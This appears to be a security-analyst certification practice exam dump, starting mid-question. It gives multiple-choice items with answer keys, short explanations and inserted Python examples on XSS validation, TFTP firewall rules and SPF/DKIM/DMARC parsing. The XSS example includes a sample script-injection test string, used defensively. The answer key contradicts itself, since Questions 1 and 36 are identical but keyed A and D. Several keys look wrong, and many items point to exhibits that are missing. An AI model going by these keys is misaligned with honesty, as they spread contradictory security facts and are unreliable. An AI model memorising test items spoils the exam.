register for the organization to look for trends and systematic issues. The steering committee wants to rank
the risks based on past incidents to improve the security program for next year. Below is the incident
register for the organization:

Which of the following should the organization consider investing in first due to the potential impact of
availability?

A. Hire a managed service provider to help with vulnerability management.
B. Build a warm site in case of system outages.
C. Invest in a failover and redundant system, as necessary.
D. Hire additional staff for the IT department to assist with vulnerability management and log review.

Correct Answer: C
Explanation

Explanation/Reference:
Investing in a failover and redundant system, as necessary, is the best solution to improve the availability
of the organization's systems based on the past incidents. A failover system is a backup system that
automatically takes over the operation of a primary system in case of a failure or outage. A redundant
system is a duplicate system that runs simultaneously with the primary system and provides backup
functionality if needed. Investing in a failover and redundant system can help to ensure that systems are
always available and can handle the workload without interruption or degradation.

QUESTION 92
A cybersecurity analyst is concerned about attacks that use advanced evasion techniques. Which of the
following would best mitigate such attacks?

A. Keeping IPS rules up to date
B. Installing a proxy server
C. Applying network segmentation
D. Updating the antivirus software

Correct Answer: A
Explanation

Explanation/Reference:
Keeping IPS rules up to date is the best way to mitigate attacks that use advanced evasion techniques. An
IPS (intrusion prevention system) is a security device that monitors network traffic and blocks or prevents
malicious activity based on predefined rules or signatures. Advanced evasion techniques are cyberattacks
that combine various evasion methods to bypass security detection and protection tools, such as IPS.
Keeping IPS rules up to date can help to ensure that the IPS can recognize and block the latest advanced
evasion techniques and prevent them from compromising the network.

Exam B

QUESTION 1
A security analyst discovers a standard user has unauthorized access to the command prompt,
PowerShell, and other system utilities. Which of the following is the BEST action for the security analyst to
take?

A. Disable the appropriate settings in the administrative template of the Group Policy.
B. Use AppLocker to create a set of whitelist and blacklist rules specific to group membership.
C. Modify the registry keys that correlate with the access settings for the System32 directory.
D. Remove the user's permissions from the various system executables.

Correct Answer: A
Explanation

QUESTION 2
An international company is implementing a marketing campaign for a new product and needs a security
analyst to perform a threat-hunting process to identify possible threat actors. Which of the following should
be the analyst's primary focus?

A. Hacktivists
B. Organized crime
C. Nation-states
D. Insider threats

Correct Answer: B
Explanation

QUESTION 3
A security engineer must deploy X.509 certificates to two web servers behind a load balancer. Each web
server is configured identically. Which of the following should be done to ensure certificate name mismatch
errors do not occur?

A. Create two certificates, each with the same fully qualified domain name, and associate each with the
web servers' real IP addresses on the load balancer.
B. Create one certificate on the load balancer and associate the site with the web servers' real IP
addresses.
C. Create two certificates, each with the same fully qualified domain name, and associate each with a
corresponding web server behind the load balancer.
D. Create one certificate and export it to each web server behind the load balancer.

Correct Answer: C
Explanation

QUESTION 4
A security analyst is reviewing existing email protection mechanisms to generate a report. The analysis
finds the following DNS records:

Record 1
v=spf1 ip4:192:168.0.0/16 include:_spf.marketing.com include: thirdpartyprovider.com ~all

Record 2
"v=DKIM1\ k=rsa\;
p=MIGfMA0GCSqh7d8hyh78Gdg87gd98hag86ga98dhay8gd7ashdca7yg79auhudig7df9ah8g76ag98dhay87ga9"

Record 3
_dmarc.comptia.com TXT v=DMARC1\; p=reject\; pct=100; rua=mailto:[email protected]

Which of the following options provides accurate information to be included in the report?

A. Record 3 serves as a reference of the security features configured at Record 1 and 2.
B. Record 1 is used as a blocklist mechanism to filter unauthorized senders.
C. Record 2 is used as a key to encrypt all outbound messages sent.
D. The three records contain private information that should not be disclosed.

Correct Answer: A
Explanation

Explanation/Reference:
The DMARC record is what tells receiving servers what to do with messages that do not properly align to SPF / DKIM.
WRONG ANSWERS
B: this SPF record, as configured, is a softfail. That means it functions less as a blocklist and more as
a quarantine list.
C: the DKIM key is used to sign, not encrypt, outbound messages.
D: all 3 records must be in public DNS or e-mail servers outside the organization would be unable to
reference them and use them.

QUESTION 5
Which of the following BEST explains the function of a managerial control?

A. To scope the security planning, program development, and maintenance of the security life cycle
B. To guide the development of training, education, security awareness programs, and system
maintenance
C. To implement data classification, risk assessments, security control reviews, and contingency planning
D. To ensure tactical design, selection of technology to protect data, logical access reviews, and the
implementation of audit trails

Correct Answer: C
Explanation

Explanation/Reference:
https://www.examtopics.com/discussions/comptia/view/84935-exam-cs0-002-topic-1-question-191-discussion/

QUESTION 6
Which of the following provides an automated approach to checking a system configuration?

A. SCAP
B. CI/CD
C. OVAL
D. Scripting
E. SOAR

Correct Answer: A
Explanation

Explanation/Reference:
SCAP (Security Content Automation Protocol) is a standardized language for expressing and manipulating
security data, including system configuration information. It provides a systematic, automated approach to
checking a system configuration, making it easier to assess the security of a system and identify
vulnerabilities. SCAP enables organizations to automate the process of security configuration management
and assessment, reducing the risk of security breaches and ensuring that systems are configured
securely. By using SCAP, organizations can improve their overall security posture, as well as comply with
various regulations and industry standards.

QUESTION 7
A digital forensics investigator works from duplicate images to preserve the integrity of the original
evidence. Which of the following types of media are MOST volatile and should be preserved? (Choose
two.)

A. Memory cache
B. Registry file
C. SSD storage
D. Temporary filesystems
E. Packet decoding
F. Swap volume

Correct Answer: AD
Explanation

QUESTION 8
A security analyst discovers the company's website is vulnerable to cross-site scripting. Which of the
following solutions will BEST remedy the vulnerability?

A. Prepared statements
B. Server-side input validation
C. Client-side input encoding
D. Disabled JavaScript filtering

Correct Answer: B
Explanation

Explanation/Reference:
The BEST solution to remedy the cross-site scripting vulnerability on the company's website is option B,
server-side input validation.

Server-side input validation involves checking user input on the server side to ensure that it meets
expected criteria before it is processed or stored. This can prevent malicious code from being injected into
the website and reduce the risk of cross-site scripting attacks.
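
As an added illustration of the server-side validation the explanation describes (example code, not from the question set or from CompTIA): the vulnerable handler concatenates untrusted input straight into HTML, while the hardened one validates the display name against an allow-list on the server and HTML-encodes both fields at output time. The comment template, the validation rules and the sample inputs are assumptions made for this example.

```python
"""Server-side input validation plus output encoding for a comment feature.
Added example for question 8, not from the question set; the template, the
validation rules and the sample inputs are constructed for illustration."""
import html
import re

# Constructed inputs of the kind a web scanner submits; they are inert here because
# nothing renders the result in a browser.
SAMPLE_INPUTS = ["Great product!", "<script>alert(1)</script>", "Nice <b>bold</b> claim"]

# Allow-list for a display name: letters, digits, space and a few punctuation marks.
DISPLAY_NAME_RE = re.compile(r"^[A-Za-z0-9 .'-]{1,40}$")


def render_comment_unsafe(author, body):
    """The vulnerable form: untrusted input is concatenated straight into HTML."""
    return f"<p><b>{author}</b>: {body}</p>"


def display_name_ok(author):
    """Allow-list validation on the server: reject anything outside the expected
    character set instead of trying to strip 'bad' characters."""
    return DISPLAY_NAME_RE.match(author) is not None


def comment_body_ok(body, max_len=500):
    """Free text cannot be allow-listed character by character, so validate what
    can be (length, no control characters) and rely on encoding at output time."""
    if len(body) > max_len:
        return False
    return not any(ord(ch) < 32 and ch not in "\n\t" for ch in body)


def render_comment_safe(author, body):
    """The hardened form: validate on the server, then HTML-encode at output so the
    browser treats the text as data rather than markup."""
    if not display_name_ok(author):
        raise ValueError("display name rejected by allow-list")
    if not comment_body_ok(body):
        raise ValueError("comment body rejected")
    return f"<p><b>{html.escape(author)}</b>: {html.escape(body)}</p>"


def carries_foreign_markup(rendered):
    """Check used by the demo: does the fragment contain any tag other than the
    template's own <p> and <b>?"""
    return "<" in re.sub(r"</?[pb]>", "", rendered)


if __name__ == "__main__":
    for text in SAMPLE_INPUTS:
        unsafe = render_comment_unsafe("eve", text)
        safe = render_comment_safe("eve", text)
        print(carries_foreign_markup(unsafe), carries_foreign_markup(safe), safe)
```

html.escape is the right encoder for text placed in an HTML element body; input that ends up in an attribute, a URL or a script block needs the encoder for that context. Validation on its own is not enough for free text, since characters such as < are legitimate in a comment, which is why the hardened handler both validates and encodes.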

QUESTION 9
During a company's most recent incident, a vulnerability in custom software was exploited on an externally
facing server by an APT. The lessons-learned report noted the following:

The development team used a new software language that was not supported by the security team's
automated assessment tools.
During the deployment, the security assessment team was unfamiliar with the new language and struggled
to evaluate the software during advanced testing. Therefore, the vulnerability was not detected. The
current IPS did not have effective signatures and policies in place to detect and prevent runtime attacks on
the new application.

To allow this new technology to be deployed securely going forward, which of the following will BEST
address these findings? (Choose two.)

A. Train the security assessment team to evaluate the new language and verify that best practices for
secure coding have been followed
B. Work with the automated assessment-tool vendor to add support for the new language so these
vulnerabilities are discovered automatically
C. Contact the human resources department to hire new security team members who are already familiar
with the new language
D. Run the software on isolated systems so when they are compromised, the attacker cannot pivot to
adjacent systems
E. Instruct only the development team to document the remediation steps for this vulnerability
F. Outsource development and hosting of the applications in the new language to a third-party vendor so
the risk is transferred to that provider

Correct Answer: AB
Explanation

QUESTION 10
A security team is struggling with alert fatigue, and the Chief Information Security Officer has decided to
purchase a SOAR platform to alleviate this issue. Which of the following BEST describes how a SOAR
platform will help the security team?

A. SOAR will integrate threat intelligence into the alerts, which will help the security team decide which
events should be investigated first.
B. A SOAR platform connects the SOC with the asset database, enabling the security team to make
informed decisions immediately based on asset criticality.
C. The security team will be able to use the SOAR framework to integrate the SIEM with a TAXII server,
which has an automated intelligence feed that will enhance the alert data.
D. Logic can now be created that will allow the SOAR platform to block specific traffic at the firewall
according to predefined event triggers and actions.

Correct Answer: A
Explanation

QUESTION 11
An analyst needs to forensically examine a Windows machine that was compromised by a threat actor.
Intelligence reports state this specific threat actor is characterized by hiding malicious artifacts, especially
with alternate data streams.
Based on this intelligence, which of the following BEST explains alternate data streams?

A. A different way data can be streamlined if the user wants to use less memory on a Windows system for
forking resources.
B. A way to store data on an external drive attached to a Windows machine that is not readily accessible
to users.
C. A Windows attribute that provides for forking resources and is potentially used to hide the presence of
secret or malicious files inside the file records of a benign file.
D. A Windows attribute that can be used by attackers to hide malicious files within system memory.

Correct Answer: C
Explanation

QUESTION 12
A cybersecurity analyst is working with a SIEM tool and reviewing the following table:

When creating a rule in the company's SIEM, which of the following would be the BEST approach for the
analyst to use to assess the risk level of each vulnerability that is discovered by the vulnerability
assessment tool?

A. Create a trend with the table and join the trend with the desired rule to be able to extract the risk level
of each vulnerability
B. Use Boolean filters in the SIEM rule to take advantage of real-time processing and RAM to store the
table dynamically, generate the results faster, and be able to display the table in a dashboard or export
it as a report
C. Use a static table stored on the disk of the SIEM system to correlate its data with the data ingested by
the vulnerability scanner data collector
D. Use the table as a new index or database for the SIEM to be able to use multisearch and then
summarize the results as output

Correct Answer: B
Explanation

QUESTION 13
A Chief Information Officer wants to implement a BYOD strategy for all company laptops and mobile
phones. The Chief Information Security Officer is concerned with ensuring all devices are patched and
running some sort of protection against malicious software. Which of the following existing technical
controls should a security analyst recommend to BEST meet all the requirements?

A. EDR
B. Port security
C. NAC
D. Segmentation

Correct Answer: A
Explanation

Explanation/Reference:
EDR stands for endpoint detection and response, which is a type of security solution that monitors and
protects all devices that are connected to a network, such as laptops and mobile phones. EDR can help to
ensure that all devices are patched and running some sort of protection against malicious software by
providing continuous visibility, threat detection, incident response, and remediation capabilities. EDR can
also help to enforce security policies and compliance requirements across all devices.
https://www.crowdstrike.com/epp-101/what-is-endpoint-detection-and-response-edr/

QUESTION 14
A security analyst receives a report indicating a system was compromised due to malware that was
downloaded from the internet using TFTP. The analyst is instructed to block TFTP at the corporate firewall.
Given the following portion of the current firewall rule set:

Which of the following rules should be added to accomplish this goal?

A. UDP ANY ANY ANY 20 Deny
B. UDP ANY ANY 69 69 Deny
C. UDP ANY ANY 67 68 Deny
D. UDP ANY ANY ANY 69 Deny
E. UDP ANY ANY ANY 69 Deny

Correct Answer: D
Explanation

Explanation/Reference:
D. A TFTP client uses a source port higher than 1024 and connects to destination port 69 on the
TFTP server. The TFTP server then responds from a port higher than 1024, so that there are no conflicts
between sessions.
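
To make the port reasoning above concrete, the following added example (not from the question set or from CompTIA) evaluates each option's rule text against a constructed TFTP request and an unrelated DHCP packet using first-match semantics. The question's existing rule set is not reproduced here, so a constructed broad allow rule stands in for it to show why the new deny rule has to sit above any rule that already permits the traffic; the addresses and port numbers of the packets are assumptions.

```python
"""First-match firewall rule evaluation in the column order used in question 14
(PROTO SRC DST SPORT DPORT ACTION). Added example, not from the question set; the
rule text comes from the answer options, the packets and addresses are constructed."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    proto: str
    src: str
    dst: str
    sport: str
    dport: str
    action: str


@dataclass(frozen=True)
class Packet:
    proto: str
    src: str
    dst: str
    sport: int
    dport: int


def parse_rule(text):
    """Parse one 'PROTO SRC DST SPORT DPORT ACTION' line; ANY is a wildcard."""
    fields = text.split()
    if len(fields) != 6:
        raise ValueError(f"expected 6 fields: {text!r}")
    return Rule(*(field.upper() for field in fields))


def _field_matches(pattern, value):
    return pattern == "ANY" or pattern == str(value).upper()


def matches(rule, pkt):
    return (_field_matches(rule.proto, pkt.proto)
            and _field_matches(rule.src, pkt.src)
            and _field_matches(rule.dst, pkt.dst)
            and _field_matches(rule.sport, pkt.sport)
            and _field_matches(rule.dport, pkt.dport))


def evaluate(rules, pkt, default="ALLOW"):
    """First matching rule wins; the default applies when nothing matches."""
    for rule in rules:
        if matches(rule, pkt):
            return rule.action
    return default


# Constructed traffic. A TFTP read request leaves the client from an ephemeral port
# (>1023) towards UDP/69; the server then answers from its own ephemeral port, so
# blocking the request is enough to stop the transfer. The DHCP offer (67 -> 68) is
# unrelated traffic the new rule must not catch.
TFTP_REQUEST = Packet("UDP", "10.0.0.25", "198.51.100.9", 49152, 69)
DHCP_OFFER = Packet("UDP", "10.0.0.1", "10.0.0.25", 67, 68)

CANDIDATES = {  # rule text from the answer options in question 14
    "A": "UDP ANY ANY ANY 20 Deny",   # 20 is FTP-data, not TFTP
    "B": "UDP ANY ANY 69 69 Deny",    # requires source port 69; clients never use it
    "C": "UDP ANY ANY 67 68 Deny",    # would break DHCP instead
    "D": "UDP ANY ANY ANY 69 Deny",
}


def options_blocking_tftp_only(candidates):
    """Letters whose rule denies the TFTP request and leaves the DHCP offer alone."""
    chosen = []
    for letter, text in candidates.items():
        rule = parse_rule(text)
        if (evaluate([rule], TFTP_REQUEST) == "DENY"
                and evaluate([rule], DHCP_OFFER) == "ALLOW"):
            chosen.append(letter)
    return chosen


def placement_check(existing_rules, new_rule_text, pkt):
    """Ordering matters under first-match: appending a deny after a broad allow has
    no effect, so the rule must be inserted ahead of any rule that already permits
    the traffic. Returns (result_if_appended, result_if_prepended)."""
    new_rule = parse_rule(new_rule_text)
    return (evaluate(existing_rules + [new_rule], pkt),
            evaluate([new_rule] + existing_rules, pkt))


if __name__ == "__main__":
    print(options_blocking_tftp_only(CANDIDATES))  # ['D']
    broad_allow = [parse_rule("UDP ANY ANY ANY ANY Allow")]  # constructed existing rule
    print(placement_check(broad_allow, CANDIDATES["D"], TFTP_REQUEST))  # ('ALLOW', 'DENY')
```

Only option D matches the request regardless of the client's ephemeral source port; option B would never fire because no client sends from port 69, and the placement check shows that the same rule appended below a broad allow is silently ignored.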

QUESTION 15
A security analyst found the following entry in a server log:

The analyst executed netstat and received the following output:

Which of the following lines in the output confirms this was successfully executed by the server?

A. 1
B. 2
C. 3
D. 4
E. 5
F. 6
G. 7

Correct Answer: E
Explanation

QUESTION 16
Which of the following weaknesses associated with common SCADA systems are the MOST critical for
organizations to address architecturally within their networks? (Choose two.)

A. Boot processes that are neither measured nor attested
B. Legacy and unpatchable systems software
C. Unnecessary open ports and protocols
D. No OS kernel mandatory access controls
E. Unauthenticated commands
F. Insecure filesystem permissions

Correct Answer: BF
Explanation

QUESTION 17
Which of the following ICS network protocols has no inherent security functions on TCP port 502?

A. CIP
B. DHCP
C. SSH
D. Modbus

Correct Answer: D
Explanation

QUESTION 18
Which of the following is the best reason why organizations need operational security controls?

A. To supplement areas that other controls cannot address
B. To limit physical access to areas that contain sensitive data
C. To assess compliance automatically against a secure baseline
D. To prevent disclosure by potential insider threats

Correct Answer: A
Explanation

QUESTION 19
While observing several host machines, a security analyst notices a program is overwriting data to a buffer.
Which of the following controls will best mitigate this issue?

A. Data execution prevention
B. Output encoding
C. Prepared statements
D. Parameterized queries

Correct Answer: A
Explanation

QUESTION 20
A security analyst is evaluating the following support ticket:

Issue: Marketing campaigns are being filtered by the customer's email servers.
Description: Our marketing partner cannot send emails using our email address. The following log
messages were collected from multiple customers:

1. The SPF result is PermError.
2. The SPF result is SoftFail or Fail.
3. The 550 SPF check failed.

Which of the following should the analyst do next?

A. Ask the marketing partner's ISP to disable the DKIM setting.
B. Request approval to disable DMARC on the company's ISP.
C. Ask the customers to disable SPF validation.
D. Request a configuration change on the company's public DNS.

Correct Answer: D
Explanation

Explanation/Reference:
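
The following added example (not from the question set or from CompTIA) ties questions 4 and 20 together: it interprets constructed SPF, DKIM and DMARC records the way a receiving server does, showing that ~all yields SoftFail rather than a hard block, that the DKIM p= tag is a public verification key rather than an encryption key, and that the DMARC p= tag sets the policy for non-aligned mail; it then classifies constructed log excerpts like the ones quoted in question 20 and maps every failure class back to the domain owner's public DNS record. Record contents, domain names, the key material and the log lines are all placeholders constructed for this example.

```python
"""Interpret SPF, DKIM and DMARC TXT records the way a receiving mail server does.
Added example for questions 4 and 20, not part of the original question set. The
records, domains, log lines and the DKIM key below are constructed placeholders."""
import ipaddress
import re

# Constructed sample records (placeholders, not real DNS data)
SPF_RECORD = ("v=spf1 ip4:192.168.0.0/16 include:_spf.marketing.example "
              "include:thirdparty.example ~all")
DKIM_RECORD = "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCPLACEHOLDERKEY"
DMARC_RECORD = "v=DMARC1; p=reject; pct=100; rua=mailto:dmarc@example.com"
SPF_QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def parse_spf(record):
    """Return (mechanisms, errors); each mechanism is (result, name, argument).
    RFC 7208 makes a malformed ip4/ip6 argument a PermError, so one bad character
    in the record breaks delivery outright (the PermError seen in question 20)."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return [], ["missing v=spf1 version tag"]
    mechanisms, errors = [], []
    for term in terms[1:]:
        qualifier = "+"
        if term[0] in SPF_QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, argument = term.partition(":")
        name = name.lower()
        if name in ("ip4", "ip6"):
            try:
                ipaddress.ip_network(argument, strict=False)
            except ValueError:
                errors.append(f"malformed {name} argument: {argument!r}")
        mechanisms.append((SPF_QUALIFIERS[qualifier], name, argument))
    return mechanisms, errors


def spf_result_for_unlisted_sender(record):
    """Result for a sending host that matches no mechanism: the 'all' qualifier decides
    (~all is SoftFail, not a hard blocklist, which is why option B in question 4 is
    wrong). A syntax error overrides everything with PermError."""
    mechanisms, errors = parse_spf(record)
    if errors:
        return "permerror"
    for result, name, _ in mechanisms:
        if name == "all":
            return result
    return "neutral"  # no 'all' term: RFC 7208 default


def parse_tags(record):
    """Parse the 'tag=value; tag=value' syntax shared by DKIM and DMARC records."""
    tags = {}
    for part in record.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    return tags


def dkim_key_role(record):
    """A DKIM record publishes the public verification key (p=). Receivers use it to
    check the signature the sender added; it encrypts nothing (option C in question 4)
    and must be world-readable in DNS (option D)."""
    tags = parse_tags(record)
    if tags.get("v", "DKIM1") != "DKIM1" or "p" not in tags:
        return "invalid"
    if tags["p"] == "":
        return "revoked"  # an empty p= tag means the selector's key was revoked
    return f"public {tags.get('k', 'rsa')} key for signature verification"


def dmarc_policy(record):
    """The p= tag tells receivers what to do with mail that fails SPF/DKIM alignment."""
    tags = parse_tags(record)
    if tags.get("v") != "DMARC1" or tags.get("p") not in ("none", "quarantine", "reject"):
        return "invalid"
    return tags["p"]


# Constructed log excerpts of the kind quoted in question 20
CUSTOMER_LOG = [
    "spf=permerror (invalid mechanism in example.com record) smtp.mailfrom=example.com",
    "spf=softfail (203.0.113.7 is not authorized by example.com) smtp.mailfrom=example.com",
    "550 5.7.1 SPF check failed",
]
RESULT_RE = re.compile(r"\b(permerror|softfail|fail)\b", re.IGNORECASE)


def diagnose_spf_log(lines):
    """Map each SPF failure class to what the domain owner must change. Every class
    lands in the domain's own public DNS record, not in the customers' validators or
    the partner's DKIM settings (question 20, option D)."""
    findings = {}
    for line in lines:
        match = RESULT_RE.search(line)
        result = match.group(1).lower() if match else (
            "fail" if "spf check failed" in line.lower() else None)
        if result == "permerror":
            findings[result] = "fix the SPF record syntax in the domain's public DNS"
        elif result in ("softfail", "fail"):
            findings[result] = "add the partner's sending hosts to the SPF record in public DNS"
    return findings
```

The parser covers the mechanism forms the questions use (ip4/ip6, include, all with a qualifier); SPF modifiers such as redirect= and the DNS lookups behind include are out of scope here. Both PermError and SoftFail in question 20 point at the same owner: the company's public SPF record, which is what option D changes.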

QUESTION 21
An application must pass a vulnerability assessment to move to the next gate. Consequently, any security
issues that are found must be remediated prior to the next gate. Which of the following best describes the
method for end-to-end vulnerability assessment?

A. Security regression testing
B. Static analysis
C. Dynamic analysis
D. Stress testing

Correct Answer: C
Explanation

QUESTION 22
A development team is discussing the implementation of parameterized queries to address several
software vulnerabilities. Which of the following is the most likely type of vulnerability the team is trying to
remediate?

A. SQL injection
B. CSRF
C. On-path attack
D. XSS

Correct Answer: A
Explanation

QUESTION 23
A security analyst is monitoring a company's network traffic and finds ping requests going to accounting
and human resources servers from a SQL server. Upon investigation, the analyst discovers a technician
responded to potential network connectivity issues. Which of the following is the best way for the security
analyst to respond?

A. Report this activity as a false positive, as the activity is legitimate.
B. Isolate the system and begin a forensic investigation to determine what was compromised.
C. Recommend network segmentation to the management team as a way to secure the various
environments.
D. Implement host-based firewalls on all systems to prevent ping sweeps in the future.

Correct Answer: A
Explanation

QUESTION 24
An organization is performing a risk assessment to prioritize resources for mitigation and remediation
based on impact. Which of the following metrics, in addition to the CVSS for each CVE, would best enable
the organization to prioritize its efforts?

A. OS type
B. OS or application versions
C. Patch availability
D. System architecture
E. Mission criticality

Correct Answer: E
Explanation

QUESTION 25
A new prototype for a company's flagship product was leaked on the internet. As a result, the management
team has locked out all USB drives. Optical drive writers are not present on company computers. The sales
team has been granted an exception to share sales presentation files with third parties. Which of the
following would allow the IT team to determine which devices are USB enabled?

A. Asset tagging
B. Device encryption
C. Data loss prevention
D. SIEM logs

Correct Answer: D
Explanation

QUESTION 26
A security officer needs to find a solution to the current data privacy and protection gap found in the last
security assessment. Which of the following is the most cost-effective solution?

A. Require users to sign NDAs.
B. Create a data minimization plan.
C. Add access control requirements.
D. Implement a data loss prevention solution.

Correct Answer: B
Explanation

QUESTION 27
A development team recently released a new version of a public-facing website for testing prior to
production. The development team is soliciting the help of various teams to validate the functionality of the
website due to its high visibility.
Which of the following activities best describes the process the development team is initiating?

A. Static analysis
B. Stress testing
C. Code review
D. User acceptance testing

Correct Answer: D
Explanation

QUESTION 28
A cybersecurity analyst is concerned about attacks that use advanced evasion techniques. Which of the
following would best mitigate such attacks?

A. Keeping IPS rules up to date
B. Installing a proxy server
C. Applying network segmentation
D. Updating the antivirus software

Correct Answer: A
Explanation

QUESTION 29
While reviewing a vulnerability assessment, an analyst notices the following issue is identified in the report:

To address this finding, which of the following would be most appropriate for the analyst to recommend to
the network engineer?

A. Reconfigure the device to support only connections leveraging TLSv1.2.
B. Obtain a new self-signed certificate and select AES as the hashing algorithm.
C. Replace the existing certificate with a certificate that uses only MD5 for signing.
D. Use only signed certificates with cryptographically secure certificate sources.

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 30
An analyst needs to understand how an attacker compromised a server. Which of the following procedures
will best deliver the information that is necessary to reconstruct the steps taken by the attacker?

A. Scan the affected system with an anti-malware tool and check for vulnerabilities with a vulnerability
scanner.
B. Extract the server's system timeline, verifying hashes and network connections during a certain time
frame.
C. Clone the entire system and deploy it in a network segment built for tests and investigations while
monitoring the system during a certain time frame.
D. Clone the server's hard disk and extract all the binary files, comparing hash signatures with malware
databases.

Correct Answer: B
Explanation

QUESTION 31
An organization is concerned about the security posture of vendors with access to its facilities and
systems. The organization wants to implement a vendor review process to ensure the policies
implemented by vendors are in line with its own.
Which of the following will provide the highest assurance of compliance?

A. An in-house red-team report
B. A vendor self-assessment report
C. An independent third-party audit report
D. Internal and external scans from an approved third-party vulnerability vendor

Correct Answer: C
Explanation

QUESTION 32
A manufacturing company has joined the information sharing and analysis center for its sector. As a
benefit, the company will receive structured IoC data contributed by other members. Which of the following
best describes the utility of this data?

A. Other members will have visibility into instances of positive IoC identification within the manufacturing
company's corporate network.
B. The manufacturing company will have access to relevant malware samples from all other
manufacturing sector members.
C. Other members will automatically adjust their security postures to defend the manufacturing company's
processes.
D. The manufacturing company can ingest the data and use tools to autogenerate security configurations
for all of its infrastructure.

Correct Answer: B
Explanation

QUESTION 33
A security analyst who works in the SOC receives a new requirement to monitor for indicators of
compromise. Which of the following is the first action the analyst should take in this situation?

A. Develop a dashboard to track the indicators of compromise.
B. Develop a query to search for the indicators of compromise.
C. Develop a new signature to alert on the indicators of compromise.
D. Develop a new signature to block the indicators of compromise.

Correct Answer: B
Explanation

QUESTION 34
During an incident response procedure, a security analyst acquired the needed evidence from the hard
drive of a compromised machine. Which of the following actions should the analyst perform NEXT to
ensure the data integrity of the evidence?

A. Generate hashes for each file from the hard drive.
B. Create a chain of custody document.
C. Determine a timeline of events using correct time synchronization.
D. Keep the cloned hard drive in a safe place.

Correct Answer: A
Explanation

QUESTION 35
An organization's Chief Information Security Officer is creating a position that will be responsible for
implementing technical controls to protect data, including ensuring backups are properly maintained.
Which of the following roles would MOST likely include these responsibilities?

A. Data protection officer
B. Data owner
C. Backup administrator
D. Data custodian
E. Internal auditor

Correct Answer: D
Explanation

Explanation/Reference:
D. In this case, the data custodian role would be the best fit because it includes responsibilities for protecting
data, including securing, monitoring, and controlling access to it, as well as ensuring data is accurate,
complete, and accessible when needed. Ensuring that backups are properly maintained would fall under
the responsibilities of a data custodian, as they would be responsible for protecting data and ensuring its
availability.

QUESTION 36
A security analyst discovers a standard user has unauthorized access to the command prompt,
PowerShell, and other system utilities. Which of the following is the BEST action for the security analyst to
take?

A. Disable the appropriate settings in the administrative template of the Group Policy.
B. Use AppLocker to create a set of whitelist and blacklist rules specific to group membership.
C. Modify the registry keys that correlate with the access settings for the System32 directory.
D. Remove the user's permissions from the various system executables.

Correct Answer: D
Explanation

Explanation/Reference:
Remove the user's permissions from the various system executables is the BEST action for the security
analyst to take.

QUESTION 37
After an incident involving a phishing email, a security analyst reviews the following email access log:

Based on this information, which of the following accounts was MOST likely compromised?

A. CARLB
B. CINDYP
C. GILLIANO
D. ANDREAD
E. LAURAB

Correct Answer: D
Explanation

QUESTION 38
A security analyst is revising a company's MFA policy to prohibit the use of short message service (SMS)
tokens. The Chief Information Officer has questioned this decision and asked for justification. Which of the
following should the analyst provide as justification for the new policy?

A. SMS relies on untrusted, third-party carrier networks.
B. SMS tokens are limited to eight numerical characters.
C. SMS is not supported on all handheld devices in use.
D. SMS is a cleartext protocol and does not support encryption.

Correct Answer: D
Explanation

QUESTION 39
A security analyst discovers the following firewall log entries during an incident:

Which of the following is MOST likely occurring?

A. Banner grabbing
B. Port scanning
C. Beaconing
D. Data exfiltration

Correct Answer: B
Explanation

QUESTION 40
An analyst received an alert regarding an application spawning a suspicious command shell process.
Upon further investigation, the analyst observes the following registry change occurring immediately after
the suspicious event:

Which of the following was the suspicious event able to accomplish?

A. Impair defenses.
B. Establish persistence.
C. Bypass file access controls.
D. Implement beaconing.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 41
An analyst is reviewing the following output:

Vulnerability found: Improper neutralization of script-related HTML tag

Which of the following was most likely used to discover this?

A. Reverse engineering using a debugger
B. A static analysis vulnerability scan
C. A passive vulnerability scan
D. A database vulnerability scan

Correct Answer: D
Explanation

QUESTION 42
A security analyst is reviewing the logs and notices the following entries:

Which of the following most likely occurred?

A. LDAP injection
B. Clickjacking
C. XSS
D. SQLi

Correct Answer: D
Explanation

QUESTION 43
After running the cat file01.bin | hexdump -C command, a security analyst reviews the following output
snippet:

Which of the following digital-forensics techniques is the analyst using?

A. Reviewing the file hash
B. Debugging the binary file
C. Implementing file carving
D. Verifying the file type
E. Utilizing reverse engineering

Correct Answer: D
Explanation

QUESTION 44
A security analyst recently implemented a new vulnerability scanning platform. The initial scan of 438 hosts
found the following vulnerabilities:

210 critical
1,854 high
1,786 medium
48 low

The analyst is unsure how to handle such a large-scale remediation effort. Which of the following would be
the next logical step?

A. Identify the assets with a high value and remediate all vulnerabilities on those hosts.
B. Perform remediation activities for all critical and high vulnerabilities first.
C. Perform a risk calculation to determine the probability and magnitude of exposure.
D. Identify the vulnerabilities that affect the most systems and remediate them first.

Correct Answer: B
Explanation

QUESTION 45
The SFTP server logs show thousands of failed login attempts from hundreds of IP addresses worldwide.
Which of the following controls would BEST protect the service?

A. Whitelisting authorized IP addresses
B. Blacklisting unauthorized IP addresses
C. Enforcing more complex password requirements
D. Establishing a sinkhole service

Correct Answer: A
Explanation

QUESTION 46
A security operations manager wants to build out an internal threat-hunting capability. Which of the
following should be the first priority when creating a threat-hunting program?

A. Establishing a hypothesis about which threats are targeting which systems
B. Profiling common threat actors and activities to create a list of IOCs
C. Ensuring logs are sent to a centralized location with search and filtering capabilities
D. Identifying critical assets that will be used to establish targets for threat-hunting activities

Correct Answer: C
Explanation

Explanation/Reference:
By aggregating logs in a centralized location with search and filtering capabilities, security analysts can
quickly and easily identify anomalous behavior that may indicate a potential threat. Additionally, a
centralized location makes it easier to correlate events across multiple systems and identify patterns that
may be indicative of an attack.

QUESTION 47
A Chief Information Security Officer is concerned that contract developers may be able to steal the code
used to design the company's latest application since they are able to pull code from a cloud-based
repository directly to laptops that are not owned by the company. Which of the following solutions would
best protect the company code from being stolen?

A. MDM
B. SCA
C. CASB
D. VDI

Correct Answer: D
Explanation

Explanation/Reference:
VDI provides a secure environment for accessing company resources, such as code repositories, from
remote locations. With VDI, the code repository would be accessed through a virtual desktop hosted on the
company's servers, rather than on the developer's laptop. This means that the company's IT department
can control the virtual desktop and ensure that it is secure, including installing security software, monitoring
activity, and limiting access to the code repository.
